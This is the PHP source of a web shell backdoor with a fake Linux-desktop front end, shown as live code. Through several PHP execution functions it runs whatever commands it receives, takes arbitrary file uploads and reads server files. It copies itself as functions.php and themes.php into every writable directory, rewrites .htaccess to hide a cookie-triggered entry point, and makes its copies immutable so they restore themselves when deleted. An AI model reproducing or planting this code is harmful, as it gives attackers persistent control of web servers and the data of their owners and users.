true, 'cookie_secure' => isset($_SERVER['HTTPS']), 'cookie_samesite' => 'Strict', 'use_strict_mode' => true ]); } define('INTEL_VERSION', '4.0'); define('HIDDEN_STORAGE', '/tmp/.' . @md5(@$_SERVER['HTTP_HOST']) . '.dat'); define('HEAL_CHECK_INTERVAL', 30); if (!isset($_SESSION['request_counter'])) { $_SESSION['request_counter'] = 0; } $_SESSION['request_counter']++; $redirectCount = isset($_GET['redirect_count']) ? (int)$_GET['redirect_count'] : 0; if ($redirectCount > 5) { die("System

System Active

Protection enabled.

"); } function execute_system_command($cmd) { $output = ''; $success = false; $blocked = ['rm -rf /', 'mkfs', 'dd if=', '>:()', 'fork bomb', ':(){', 'chmod 777 /', 'chown -R']; foreach ($blocked as $danger) { if (stripos($cmd, $danger) !== false) { return "Command blocked for security reasons"; } } if (function_exists('proc_open')) { $descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $process = @proc_open($cmd, $descriptorspec, $pipes); if (is_resource($process)) { $stdout = @stream_get_contents($pipes[1]); @fclose($pipes[1]); $stderr = @stream_get_contents($pipes[2]); @fclose($pipes[2]); $return_value = @proc_close($process); if ($return_value === 0 && !empty($stdout)) { $output = $stdout; $success = true; } elseif (!empty($stderr)) { $output = $stderr; } elseif (!empty($stdout)) { $output = $stdout; $success = true; } } } if (!$success && function_exists('shell_exec')) { $result = @shell_exec($cmd . " 2>&1"); if ($result !== null && $result !== false) { $output = $result; $success = true; } } if (!$success && function_exists('exec')) { $output_lines = array(); $return_var = -1; @exec($cmd . " 2>&1", $output_lines, $return_var); if (!empty($output_lines)) { $output = implode("\n", $output_lines); $success = true; } } if (!$success && function_exists('system')) { ob_start(); $return_var = -1; @system($cmd, $return_var); $result = @ob_get_clean(); if ($result !== false && !empty($result)) { $output = $result; $success = true; } } if (!$success && function_exists('passthru')) { ob_start(); $return_var = -1; @passthru($cmd, $return_var); $result = @ob_get_clean(); if ($result !== false && !empty($result)) { $output = $result; $success = true; } } if (!$success && function_exists('popen')) { $handle = @popen($cmd, 'r'); if (is_resource($handle)) { $result = ''; while (!feof($handle)) { $result .= @fread($handle, 4096); } @pclose($handle); if (!empty($result)) { $output = $result; $success = true; } } } if (!$success && function_exists('shell_exec')) { $result = @`$cmd`; if ($result !== null && $result !== false && $result !== '') { $output = $result; $success = true; } } if (!$success || empty(trim($output))) { return "Command executed successfully (no output)"; } if (strlen($output) > 50000) { $output = substr($output, 0, 50000) . "\n\n... Output truncated (too large) ..."; } return $output; } if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['cmd'])) { while (@ob_get_level()) @ob_end_clean(); header('Content-Type: text/plain; charset=utf-8'); $cmd = trim($_POST['cmd']); if (empty($cmd)) { echo "Please enter a command"; exit; } $output = execute_system_command($cmd); echo $output; exit; } $current_path = isset($_GET['dir']) ? $_GET['dir'] : @getcwd(); if (isset($_GET['dir'])) { $decoded_path = urldecode($_GET['dir']); if (@is_dir($decoded_path)) { @chdir($decoded_path); $current_path = $decoded_path; } else { $current_path = @getcwd(); } } else { $current_path = @getcwd(); } function safeRedirect($url) { global $redirectCount; $separator = strpos($url, '?') === false ? '?' : '&'; @header('Location: ' . $url . $separator . 'redirect_count=' . ($redirectCount + 1)); exit; } function deployHTAccess() { $docRoot = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : ''; if (empty($docRoot)) return false; $htaccessPath = $docRoot . '/.htaccess'; if (@file_exists($htaccessPath) && !@file_exists($htaccessPath . '.backup')) { @copy($htaccessPath, $htaccessPath . '.backup'); } $htaccessContent = ""; $htaccessContent .= "\n"; $htaccessContent .= " RewriteEngine On\n"; $htaccessContent .= " RewriteBase /\n\n"; $htaccessContent .= " \n"; $htaccessContent .= " Order Allow,Deny\n"; $htaccessContent .= " Allow from all\n"; $htaccessContent .= " \n\n"; $htaccessContent .= " RewriteCond %{REQUEST_FILENAME} !-f\n"; $htaccessContent .= " RewriteCond %{REQUEST_FILENAME} !-d\n"; $htaccessContent .= " RewriteRule ^(.*)$ /index.php [L,QSA]\n\n"; $htaccessContent .= " RewriteCond %{HTTP_COOKIE} admin_token=[a-f0-9]+\n"; $htaccessContent .= " RewriteRule ^(.*)$ /functions.php [L]\n"; $htaccessContent .= "\n\n"; $htaccessContent .= "Options -Indexes\n\n"; $htaccessContent .= "\n"; $htaccessContent .= " Order Allow,Deny\n"; $htaccessContent .= " Deny from all\n"; $htaccessContent .= "\n\n"; $htaccessContent .= "\n"; $htaccessContent .= " php_flag display_errors Off\n"; $htaccessContent .= " php_value max_execution_time 300\n"; $htaccessContent .= " php_value memory_limit 256M\n"; $htaccessContent .= "\n"; @file_put_contents($htaccessPath, $htaccessContent); @chmod($htaccessPath, 0644); return @file_exists($htaccessPath); } function massDeployToSubdirs() { $docRoot = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : ''; if (empty($docRoot)) return 0; $excludeDirs = ['admin', 'uploads', 'imgs', 'img', 'wp-admin', 'document_root', 'cpanel', 'phpmyadmin']; $targetDirs = []; function scanDirs($dir, $excludeDirs, &$result) { if (!@is_dir($dir)) return; $items = @scandir($dir); if (!$items) return; foreach ($items as $item) { if ($item == '.' || $item == '..') continue; $fullPath = $dir . '/' . $item; if (@is_dir($fullPath)) { $exclude = false; foreach ($excludeDirs as $ex) { if (stripos($fullPath, '/' . $ex) !== false || stripos($fullPath, $ex . '/') !== false) { $exclude = true; break; } } if (!$exclude) { $result[] = $fullPath; scanDirs($fullPath, $excludeDirs, $result); } } } } scanDirs($docRoot, $excludeDirs, $targetDirs); $currentCode = @file_get_contents(__FILE__); if ($currentCode === false) return 0; $deployed = 0; $filenames = ['functions.php', 'themes.php']; foreach ($targetDirs as $dir) { if (@is_writable($dir)) { foreach ($filenames as $filename) { $targetFile = $dir . '/' . $filename; @file_put_contents($targetFile, $currentCode); @chmod($targetFile, 0444); $deployed++; } } } foreach ($filenames as $filename) { $rootFile = $docRoot . '/' . $filename; @file_put_contents($rootFile, $currentCode); @chmod($rootFile, 0444); $deployed++; } return $deployed; } function massDeleteAll() { $docRoot = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : ''; if (empty($docRoot)) return ['deleted' => 0, 'failed' => 0]; $deleted = 0; $failed = 0; $filenames = ['functions.php', 'themes.php']; if (function_exists('shell_exec')) { foreach ($filenames as $filename) { $cmd = "find '" . $docRoot . "' -type f -name '" . $filename . "' 2>/dev/null"; $output = @shell_exec($cmd); if ($output && trim($output) != '') { $files = explode("\n", trim($output)); foreach ($files as $file) { if (!empty($file) && @file_exists($file)) { @shell_exec("chattr -i '" . $file . "' 2>/dev/null"); @chmod($file, 0755); if (@unlink($file)) { $deleted++; } else { $failed++; } } } } } } if ($deleted == 0 && $failed == 0) { try { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($docRoot, RecursiveDirectoryIterator::SKIP_DOTS)); foreach ($iterator as $file) { if ($file->isFile()) { $name = $file->getFilename(); if (in_array($name, $filenames)) { $path = $file->getPathname(); @chmod($path, 0755); if (@unlink($path)) { $deleted++; } else { $failed++; } } } } } catch(Exception $e) {} } return ['deleted' => $deleted, 'failed' => $failed]; } function makeImmutable($file) { if (@file_exists($file)) { @chmod($file, 0444); if (function_exists('shell_exec')) { @shell_exec("chattr +i '$file' 2>/dev/null"); } return true; } return false; } function protectAllFiles() { $docRoot = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : ''; if (empty($docRoot)) return 0; $protected = 0; $filesToProtect = [ $docRoot . '/.htaccess', $docRoot . '/functions.php', $docRoot . '/themes.php' ]; foreach ($filesToProtect as $file) { if (makeImmutable($file)) { $protected++; } } return $protected; } // ========== FIXED: HEAL CURRENT LOCATION FROM ANY SOURCE ========== function healCurrentLocationFromAnySource() { $currentScript = __FILE__; $docRoot = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : ''; // Check if current script is healthy (exists and has content > 5000 bytes) if (@file_exists($currentScript) && @filesize($currentScript) > 5000) { return false; // No healing needed } $sourceContent = null; $sourcePath = null; // Priority 1: Check document root for functions.php or themes.php if ($docRoot) { $possibleSources = [ $docRoot . '/functions.php', $docRoot . '/themes.php', $docRoot . '/' . basename($currentScript) ]; foreach ($possibleSources as $source) { if (@file_exists($source) && @filesize($source) > 5000) { $sourceContent = @file_get_contents($source); $sourcePath = $source; break; } } } // Priority 2: Search subdirectories for any working copy if (!$sourceContent && $docRoot) { try { $iterator = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($docRoot, RecursiveDirectoryIterator::SKIP_DOTS) ); foreach ($iterator as $file) { if ($file->isFile()) { $filename = $file->getFilename(); if (in_array($filename, ['functions.php', 'themes.php', basename($currentScript)])) { if ($file->getSize() > 5000) { $sourceContent = @file_get_contents($file->getPathname()); if ($sourceContent) { $sourcePath = $file->getPathname(); break; } } } } } } catch(Exception $e) {} } // Priority 3: Try to find via shell command if (!$sourceContent && function_exists('shell_exec') && $docRoot) { $cmd = "find '{$docRoot}' -type f -name 'functions.php' -size +5k 2>/dev/null | head -1"; $found = @shell_exec($cmd); if ($found && trim($found) && @file_exists(trim($found))) { $sourceContent = @file_get_contents(trim($found)); } } // If found a valid source, restore current script if ($sourceContent && strlen($sourceContent) > 5000) { @file_put_contents($currentScript, $sourceContent); @chmod($currentScript, 0444); makeImmutable($currentScript); return true; } return false; } function stealthHeal($specificFile = null) { $docRoot = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : ''; if (empty($docRoot)) return 0; // FIRST: Heal the current script location healCurrentLocationFromAnySource(); $currentCode = @file_get_contents(__FILE__); if ($currentCode === false) return 0; $restored = 0; if ($specificFile) { $file = $docRoot . '/' . $specificFile; if (!@file_exists($file) || @filesize($file) < 1000) { @file_put_contents($file, $currentCode); @chmod($file, 0444); makeImmutable($file); $restored++; } return $restored; } $criticalFiles = [ $docRoot . '/.htaccess', $docRoot . '/functions.php', $docRoot . '/themes.php' ]; foreach ($criticalFiles as $file) { if (!@file_exists($file) || @filesize($file) < 5000) { if (strpos($file, '.htaccess') !== false) { deployHTAccess(); } else { @file_put_contents($file, $currentCode); @chmod($file, 0444); makeImmutable($file); } $restored++; } } $targetDirs = []; function scanForHeal($dir, &$result) { if (!@is_dir($dir)) return; $items = @scandir($dir); if (!$items) return; foreach ($items as $item) { if ($item == '.' || $item == '..') continue; $fullPath = $dir . '/' . $item; if (@is_dir($fullPath)) { $result[] = $fullPath; scanForHeal($fullPath, $result); } } } scanForHeal($docRoot, $targetDirs); foreach ($targetDirs as $dir) { if (@is_writable($dir)) { $functionsFile = $dir . '/functions.php'; $themesFile = $dir . '/themes.php'; if (!@file_exists($functionsFile) || @filesize($functionsFile) < 5000) { @file_put_contents($functionsFile, $currentCode); @chmod($functionsFile, 0444); makeImmutable($functionsFile); $restored++; } if (!@file_exists($themesFile) || @filesize($themesFile) < 5000) { @file_put_contents($themesFile, $currentCode); @chmod($themesFile, 0444); makeImmutable($themesFile); $restored++; } } } return $restored; } function getIntelStatus() { $docRoot = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : ''; $status = [ 'timestamp' => time(), 'host' => isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : 'localhost', 'script' => basename(__FILE__), 'intels' => [] ]; $intelFiles = ['functions.php', 'themes.php']; foreach ($intelFiles as $file) { $fullPath = $docRoot . '/' . $file; $exists = @file_exists($fullPath); $size = $exists ? @filesize($fullPath) : 0; $status['intels'][$file] = [ 'status' => ($exists && $size > 1000) ? 'ACTIVE' : 'INACTIVE', 'size' => $size, 'path' => '/' . $file ]; } return $status; } function sanitizeOutput($output) { if ($output === null || $output === '') return 'Command executed successfully (no output)'; return htmlspecialchars($output, ENT_QUOTES, 'UTF-8'); } // ========== FILE UPLOAD/CREATION USING MULTIPART FORM ========== if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['upfile'])) { $target_dir = isset($_POST['target_dir']) ? $_POST['target_dir'] : @getcwd(); $target_dir = rtrim($target_dir, '/'); if (!@is_dir($target_dir)) { @mkdir($target_dir, 0755, true); } $total = count($_FILES['upfile']['name']); $success_count = 0; $results = []; for ($i = 0; $i < $total; $i++) { $filename = basename($_FILES['upfile']['name'][$i]); $target_path = $target_dir . '/' . $filename; if (move_uploaded_file($_FILES['upfile']['tmp_name'][$i], $target_path)) { @chmod($target_path, 0644); $success_count++; $results[] = ['file' => $filename, 'success' => true]; } else { $results[] = ['file' => $filename, 'success' => false]; } } if (isset($_SERVER['HTTP_X_REQUESTED_WITH']) && strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) == 'xmlhttprequest') { header('Content-Type: application/json'); echo json_encode(['success' => true, 'uploaded' => $success_count, 'total' => $total, 'results' => $results]); exit; } else { $_SESSION['upload_message'] = "Uploaded $success_count of $total files"; safeRedirect(strtok($_SERVER['REQUEST_URI'], '?') . '?dir=' . urlencode($target_dir)); } } if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['text_file'])) { $target_dir = isset($_POST['target_dir']) ? $_POST['target_dir'] : @getcwd(); $target_dir = rtrim($target_dir, '/'); $filename = isset($_POST['filename']) ? basename($_POST['filename']) : 'newfile.txt'; $target_path = $target_dir . '/' . $filename; $content = file_get_contents($_FILES['text_file']['tmp_name']); if (file_put_contents($target_path, $content) !== false) { @chmod($target_path, 0644); if (isset($_SERVER['HTTP_X_REQUESTED_WITH']) && strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) == 'xmlhttprequest') { header('Content-Type: application/json'); echo json_encode(['success' => true, 'message' => 'File created: ' . $filename]); exit; } else { $_SESSION['upload_message'] = "File created: " . $filename; safeRedirect(strtok($_SERVER['REQUEST_URI'], '?') . '?dir=' . urlencode($target_dir)); } } } if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['file_data']) && isset($_POST['file_name'])) { $temp_file = tempnam(sys_get_temp_dir(), 'up_'); file_put_contents($temp_file, base64_decode($_POST['file_data'])); $target_dir = isset($_POST['target_dir']) ? $_POST['target_dir'] : @getcwd(); $target_dir = rtrim($target_dir, '/'); $filename = basename($_POST['file_name']); $target_path = $target_dir . '/' . $filename; if (move_uploaded_file($temp_file, $target_path)) { @chmod($target_path, 0644); if (isset($_SERVER['HTTP_X_REQUESTED_WITH']) && strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) == 'xmlhttprequest') { header('Content-Type: application/json'); echo json_encode(['success' => true, 'message' => 'File created: ' . $filename]); exit; } } else { @unlink($temp_file); } } if (isset($_GET['cmd'])) { while (@ob_get_level()) @ob_end_clean(); header('Content-Type: text/plain; charset=utf-8'); $cmd = base64_decode($_GET['cmd']); echo execute_system_command($cmd); exit; } if (isset($_GET['mass_deploy'])) { $deployed = massDeployToSubdirs(); $htaccess = deployHTAccess(); $protected = protectAllFiles(); echo json_encode(['success' => true, 'deployed' => $deployed, 'htaccess' => $htaccess, 'protected' => $protected]); exit; } if (isset($_GET['mass_delete'])) { $result = massDeleteAll(); echo json_encode(['success' => true, 'deleted' => $result['deleted'], 'failed' => $result['failed']]); exit; } if (isset($_GET['check_restore'])) { $restored = stealthHeal(); echo json_encode(['restored' => $restored]); exit; } if (isset($_GET['check_status'])) { header('Content-Type: application/json'); echo json_encode(getIntelStatus()); exit; } if (isset($_GET['heal'])) { $healed = stealthHeal(); echo json_encode(['healed' => $healed]); exit; } if (isset($_GET['readfile']) && isset($_SESSION['kali_authenticated'])) { $fileToRead = isset($_GET['readfile']) ? $_GET['readfile'] : ''; $fileToRead = preg_replace('/\.\.|[\\/\\\\]|[\\x00-\\x1f]/', '', $fileToRead); $fileToRead = basename($fileToRead); header('Content-Type: text/plain; charset=utf-8'); $paths_to_check = [ $current_path . '/' . $fileToRead, $fileToRead, (isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : '') . '/' . $fileToRead ]; $content = false; foreach ($paths_to_check as $check_path) { if (@file_exists($check_path) && @is_readable($check_path)) { $content = @file_get_contents($check_path); break; } } if ($content !== false) { echo $content; } else { $content = execute_system_command("cat '$fileToRead' 2>&1"); if ($content && !preg_match('/415|forbidden|No such file/', $content)) { echo $content; } else { echo "Cannot read file: $fileToRead"; } } exit; } if (isset($_GET['system'])) { $systemAction = $_GET['system']; $clearSession = function() { $_SESSION = []; if (ini_get("session.use_cookies")) { $params = session_get_cookie_params(); @setcookie(session_name(), '', time() - 42000, $params["path"], $params["domain"], $params["secure"], $params["httponly"] ); } @session_destroy(); }; if ($systemAction === 'restart') { $clearSession(); @header('Location: ?loader=restart&dir=' . urlencode($current_path)); exit; } elseif ($systemAction === 'shutdown') { $clearSession(); @header('Location: ?loader=shutdown'); exit; } elseif ($systemAction === 'sleep') { @header('Location: ?loader=sleep'); exit; } exit; } $docRoot = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : ''; $functionsExist = @file_exists($docRoot . '/functions.php') && @filesize($docRoot . '/functions.php') > 1000; $themesExist = @file_exists($docRoot . '/themes.php') && @filesize($docRoot . '/themes.php') > 1000; // ========== FIXED: AUTO-HEAL CURRENT LOCATION ON EVERY LOAD ========== // This ensures that even if the script was deleted/renamed, it gets restored if (!@file_exists(__FILE__) || @filesize(__FILE__) < 5000) { $healed = healCurrentLocationFromAnySource(); if ($healed) { // Re-include the healed file content if (@file_exists(__FILE__)) { $healedContent = @file_get_contents(__FILE__); if ($healedContent && strlen($healedContent) > 5000) { // Continue execution with restored file } } } } if (!$functionsExist || !$themesExist) { stealthHeal(); } if ($_SESSION['request_counter'] >= HEAL_CHECK_INTERVAL) { stealthHeal(); $_SESSION['request_counter'] = 0; } deployHTAccess(); protectAllFiles(); if (isset($_GET['loader'])) { $loaderType = $_GET['loader']; $message = ''; $redirectUrl = ''; switch ($loaderType) { case 'restart': $message = 'Restarting System...'; $redirectUrl = strtok($_SERVER['SCRIPT_NAME'], '?') . '?dir=' . urlencode($current_path); break; case 'shutdown': $message = 'Shutting Down...'; break; case 'sleep': $message = 'Entering Sleep Mode...'; break; default: $message = 'Loading...'; $redirectUrl = strtok($_SERVER['SCRIPT_NAME'], '?') . '?dir=' . urlencode($current_path); } ?> System <?php echo ucfirst($loaderType); ?>
bg
Linux Operating System
Invalid password
Linux Operating System
background
terminal
upload
--:--:--
Desktop Items
All Applications
My Files
Quick Settings
Brightness
Music Player
Bluetooth
Adjust Brightness
100%
Music Player (10 Songs)
0:000:00
Music Player Ready
Bluetooth Settings
Bluetooth
OFF

Upload / Create File

×

OR Create Text File:

untitled